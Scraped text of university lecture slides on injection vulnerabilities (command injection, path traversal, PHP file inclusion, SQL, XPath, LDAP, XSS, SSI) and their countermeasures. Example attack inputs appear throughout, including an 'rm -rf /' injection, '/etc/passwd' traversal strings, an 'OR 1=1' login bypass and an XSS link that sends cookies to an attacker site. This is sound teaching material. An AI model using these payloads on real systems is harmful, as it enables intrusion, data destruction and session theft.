Software Security problems. Erik Poll. Digital Security group Radboud University Nijmegen

Size: px

Start display at page:

Download "Software Security problems. Erik Poll. Digital Security group Radboud University Nijmegen"

Julie Harper
6 years ago
Views:

1 Software Security problems Erik Poll Digital Security group Radboud University Nijmegen

contagious Terminology: input is tainted data Untrusted input or untrusted user input are pleonastic expressions: by

2 Problems with Insecure input handling is the most common security problem aka lack of input validation, but that terminology is misleading (as we ll see) All input is dangerous & evil All input should be treated as highly poisonous & contagious Terminology: input is tainted data Untrusted input or untrusted user input are pleonastic expressions: by default, any input should be untrusted Input problems we already saw: buffer overflows, format string attacks, integer overflows 2

3 Examples of input attacks Overview Countermeasures sandboxing input validation & output encoding tackling the problem at more fundamental levels LangSec programming-language support with domainspecific language extentions (Wyvern) 3

4 Overview OS command injection path traversal chroot jail PHP injection remote and local SQL injection 2 nd order SQL injection Blind SQL injection HTML injection/xss httponly CSP (Content Security Policy) SSI (Server Side Includes) injection 4

5 Command injection A CGI shell script used as part of a website might contain cat thefile mail clientadres An attacker might enter address erik@cs.ru.nl rm fr / What happens then? cat thefile mail erik@cs.ru.nl rm fr / Can you think of countermeasures? validating input (aka sanitising input) removing or escaping dangerous characters, e.g. > < & better: check that clientadres is well-formed address reduce access rights of this CGI script (defense in depth) maybe we shouldn t use a scripting language for this? 5

6 Command injection Many API calls and language constructs in languages are affected, eg shell scripts C/C++ system(), execvp(), ShellExecute(),.. Java Runtime.exec(),... Perl system, exec, open, `, /e,... Python exec, eval, input, execfile, Any use of these constructs merits close attention! A basic static analysis tool can easily warn us of their use A more advanced tool that does data flow analysis can give more precise warnings, about only those uses that involve user-supplied (aka tainted) arguments eg. using PREfast with clumsy [SA_Post(Tainted=SA_Yes)] annotations 6

7 Path traversal aka directory traversal File names constructed from user input esp. by string concatenation can cause problems. Eg suppose a program uses the paths 1. "/usr/local/client-info/" ++ username 2. "/usr/local/profilepictures/" ++ username ++ ".jpg" Malicious usernames for attacker to inject: 1.../../../etc/passwd 2.../../../etc/passwd%00 null terminator %00 means suffix.jpg will be ignored NB Validating file names is difficult (more on that later): reuse existing code! Additional countermeasure: restrict file access using a chroot jail 7

8 chroot jail chroot (change root) restricts access of a process to a subset of file system, ie. changes the root of file system for that process This is a form of sandboxing. Eg run an application you just downloaded with chroot /home/sos/erik/trial ; /tmp to restrict access to just these two directories Using the traditional OS access control permission for this, instead chroot, would be very tricky! This would require having to permissions right all over the file system 8

9 Attacker can Fun with path traversal look around on the file system for useful information, eg configuration or password files access special files to cause Denial-of-Service (DoS), eg../../dev/random../../var/spool/lpr (is very long to read) (is impossible to read) get application to write info in a place the attacker can access, to then read or modify. eg /mnt/usbkey or /tmp/file get application to use - ideally, execute - data on the target system that the attacker can control (see PHP examples later on) Note that this includes attacks on confidentiality, availability, and integrity 9

10 Path traversal example [thanks to Arne Swinnen] Where would you try a path name injection on https//instagram.com/?hl=en? 10 websec

11 11 websec

12 Strange input leads to the Dutch page. Why? 12 websec

13 13 websec

Enter fuzzdb, to fuzz common file names Fuzzdb finds 42 hits for../<guess>/../locale/nl/ Facebook bug bounty program paid Arne 500$ More instagram flaws at http://www.

14 Enter fuzzdb, to fuzz common file names Fuzzdb finds 42 hits for../<guess>/../locale/nl/ Facebook bug bounty program paid Arne 500$ More instagram flaws at

15 Injection attacks on PHP PHP code can dynamically include other files, eg. based on an option chosen from menu on webpage $dir = $_GET['option'] include($dir. "/function.php") So for the URL the webserver will execute <current_directory>/1/function.php Note: here option would be a parameter in the URL, and. denotes string concatenation in PHP 15

16 Injection attacks on PHP 1. option=../../somedir/anotherdir Attacker can execute any file called function.php on server 2. option=../../somedir/anyfile.php%00 Attacker can execute any file on the server 3. option=../../john/profilepicture.jpg%00 John s profile picture will be executed as PHP code, so attacker John can execute his own PHP code if he has an account. NB this illustrates how evil can spreads with input! 4. option= Poorly configured PHP web server will now dynamically load PHP code over the web are Local File Inclusion (LFI), 4 is Remote File Inclusion (RFI) Note that 1 & 2 are like return-to-libc attacks, but for PHP instead of C. 16

17 Countermeasure: indirect selection Don't use the user input to construct a value, but use it to select from a set of legitimate values, eg $dir = $_GET['option'] if ($dir = 1){ } else { }} Downsides? include("1/function.php") if ($dir = 2){ include("2/function.php") } else {... // include nothing, of report error? More work, less flexible, and does not work in all situations. 17

18 18

19 SQL injection Username Password erik ****** 19

20 SQL injection $result = mysql_query( SELECT * FROM Accounts. WHERE Username = $username. AND Password = $password ; ); if (mysql_num_rows($result)>0) $login = true; 20

21 SQL injection Resulting SQL query SELECT * FROM Accounts WHERE Username = erik AND Password = secret ; 21

22 SQL injection Username Password OR 1=1;/* ****** 22

23 SQL injection Resulting SQL query SELECT * FROM Accounts WHERE Username = OR 1=1;/* AND Password = secret ; 23

24 SQL injection Resulting SQL query SELECT * FROM Accounts WHERE Username = OR 1=1; /* AND Password = secret ; Oops! 24

variation: SQL Database Command Injection Injecting SQL command with ; not manipulating SQL query with ` Highly dependent on infrastructure, eg Each database has

25 variation: SQL Database Command Injection Injecting SQL command with ; not manipulating SQL query with ` Highly dependent on infrastructure, eg Each database has its own commands eg. Microsoft SQL Server has exec master.dbo.xp_cmdshell Some configurations don't allow use of ; eg Oracle database accessed via Java or PL/SQL 25

26 variation: Function Call Injection Oracle SQL has over 1000 built-in functions to use in queries, eg TRANSLATE TRANSLATE('a1b2ff', 'abcdef', 'ABCDEF') = 'A1B2FF' Arguments of such functions may be poisoned with other functions, eg SELECT TRANSLATE('user input'', 'abcd', 'ABCD')FROM... can become SELECT TRANSLATE('' UTL_HTTP.REQUEST( '', 'abcd', 'ABCD')FROM... Here UTL_HTTP does HTTP request directly from the Oracle database, which is running behind the company firewall... 26

27 Example: 2 nd order SQL injection Suppose I want to access tanja's account 1. I register an account myself with the name tanja' I log in as tanja' -- and change my password 3. If the password change is done with the SQL statement UPDATE users SET password='abcd1234' WHERE username='tanja' --' and password='abc' then I have reset tanja's password Here abcd1234 is user input, but the dangerous input to the statement comes from the server's own database, where it was injected earlier The moral of the story: don't trust any input, not even data coming from sources you think can trust 27

28 Blind SQL injection Suppose results in SQL injection-prone query SELECT title, body FROM items WHERE id=2 Will we see difference response to URLs below? 1. AND 1= AND 1=2 What will be the result of../items.php?id=2 AND SUBSTRING(user,1,1) = a The same as 1 iff user starts with a; otherwise the same as 2! So we can use this to find out things about the database structure & content! 28

29 Blind SQL injection Blind SQL injection: a SQL injection where not the response itself is interesting, but the type of the response, or lack of response, leaks information to an attacker Errors can also leak interesting information: eg for IF <some condition> SELECT 1 ELSE 1/0 error message may reveal if <some condition> is true More subtle than this, response time may still leak information.. IF(SUBSTRING(user,1,1) = a, BENCHMARK(50000, ), null).. time-consuming BENCHMARK statement only executed if user starts with a 29

30 More injection possibilities 2nd order SQL injection User input, eg a username, containing malicious SQL fragment does not cause harm on first use, but is stored in the server to cause problems later Moral: don't trust anything! Blind SQL injection Response time or error message of a tainted SQL query leaks information (a so-called side channel attack) XPath injection on XML data Corrupt XPath query to access XML data, eg with ' or '1'='1' LDAP injection Corrupt LDAP query sent to LDAP server, the central repository of user info in corporate environments, eg with admin)(&) Not to mention blind XPath injection, 2nd order blind LDAP injection, etc. etc. 30

31 XML data, eg XPath injection in XML <student_database> <student><username>jan</username><passwd>abcd1234</passwd> </student> <student><username>kees</nameuser><passwd>geheim</passwd> <student> </student_database> can be accessed by XPath queries, eg (//student[username/text()='jan' and passwd/text()='abcd123']/account/text()) _database> which can be corrupted by malicious input such as ' or '1'='1' 31

32 LDAP injection An LDAP query sent to the LDAP server to authenticate a user (&(USER=jan)(PASSWD=abcd1234)) can be corrupted by giving as username admin)(&) which results in (&(USER=name)(&))(PASSWD=pwd) where only first part is used, and (&) is LDAP notation for TRUE There are also blind LDAP injection attacks. 32

33 HTML injection sos Search No matches found for sos 33

34 HTML injection <h1>sos</h1> Search c No matches found for sos 34

35 HTML injection <h1>sos</h1> Search c No matches found for <h1>sos</h1> If application escapes dangerous characters, eg by replacing < by &lt, then HTML tags will not be interpreted as HTML 35

36 HTML injection & XSS Web server returns HTML code injected by the user Attacker can abuse this by letting the server return his HTML content to other users by sending victims a link that will echo his HTML code (reflected HTML injection) by posting HTML content in the server, eg. a web forum (stored HTML injection) If the injected HTML contains scripts, this is called XSS (Cross Site Scripting). These scripts are executed in the browser on the victim s machine, using the victim access rights! The attacker can perform actions inside the victim s browser, or try to steal information (esp. session cookies) 36

37 Example: Reflected XSS attack via error message Suppose accessing a web page returns a webpage with the text Page not found This error page may allow a reflected XSS attack: accessing may produces a webpage with a pop-up window. An attacker could exploit this to steal cookies, by sending people containing the link ookiestealer.php?cookie='+document.cookie</script> to pass ru.nl-cookie as parameter in HTTP request to mafia.com 37

38 Protection measures for XSS httponly cookies Prevents any javascript from accessing cookies, to stop XSS attacks stealing cookies CSP (Content Security Policy) Policy that whitelists trusted sources that are allowed in a page, enforced by the browser Some protection, but not against XSS secure cookies prevents any network eavesdropper from observing cookies, by only sending them over https SOP (Single Origin Policy) Prevents javascript in 3rd party content in a webpage from accessing rest of the page.. These are no help whatsoever against (stored or reflected) XSS. 38

39 CSP example A webpage from bank.com could contain CSP header Content-Security-Policy: default-src 'self'; img-src 'self' disney.com child-src script-src apis.google.com to only allow images from bank.com itself or from disney.com embedded frames from youtube, included via https scripts from apis.google.com This is a form of sandboxing, in this case enforced by the browser. 39

40 SSI Injection Server-Side Includes (SSI) are instructions for a web server written inside HTML. For instance, to include some file  If attacker can inject HTML into a webpage, then he can try to inject a SSI directive that will be executed on the server NB: with SSI injection the injected code is executed server-side, whereas with XSS the injected javascript is executed client-side Of course, there is a directive to execute programs & scripts  40

41 More injection problems: OWASP list Blind SQL Injection Blind XPath Injection Code Injection Command Injection Comment Injection Attack Content Spoofing CORS RequestPreflightScrutiny Cross-site Scripting (XSS) Custom Special Character Injection Direct Dynamic Code Evaluation ('Eval Injection') Format string attack Full Path Disclosure Function Injection LDAP injection Parameter Delimiter PHP Object Injection Regular expression Denial of Service - ReDoS Resource Injection Server-Side Includes (SSI) Injection Special Element Injection SQL Injection SQL Injection Bypassing WAF Web Parameter Tampering XPATH Injection [ 41

42 More injection problems: CWE classication Several categories & clusters in the CWE classification, e.g. CWE-20 Improper Input Validation CWE-896 Tainted Input distinguishes a few dozens of variants of input attacks See

43 CWE/SANS Top 25 (out of 732!) [Version 3.0] Improper Neutralization of Special Elements used in an SQL Command... ('OS Command Injection') Buffer Overflow.. ('Cross-site Scripting') Missing Authentication for Critical Function Missing Authorization Use of Hard-coded Credentials Missing Encryption of Sensitive Data Unrestricted Upload of File with Dangerous Type Reliance on Untrusted Inputs in a Security Decision Execution with Unnecessary Privileges Cross-Site Request Forgery (CSRF) ('Path Traversal') Download of Code Without Integrity Check Incorrect Authorization Inclusion of Functionality from Untrusted Control Sphere Incorrect Permission Assignment Use of Potentially Dangerous Function Use of a Broken or Risky Cryptographic Algorithm Incorrect Calculation of Buffer Size Improper Restriction of Excessive Authentication Attempts URL Redirection to Untrusted Site ('Open Redirect') Uncontrolled Format String Integer Overflow or Wraparound Use of a One-Way Hash without a Salt 43

Software Security problems. Erik Poll. Digital Security group Radboud University Nijmegen

Software Security problems. Erik Poll. Digital Security group Radboud University Nijmegen Software Security problems Erik Poll Digital Security group Radboud University Nijmegen Problems with Insecure input handling is the most common security problem aka lack of input validation, but that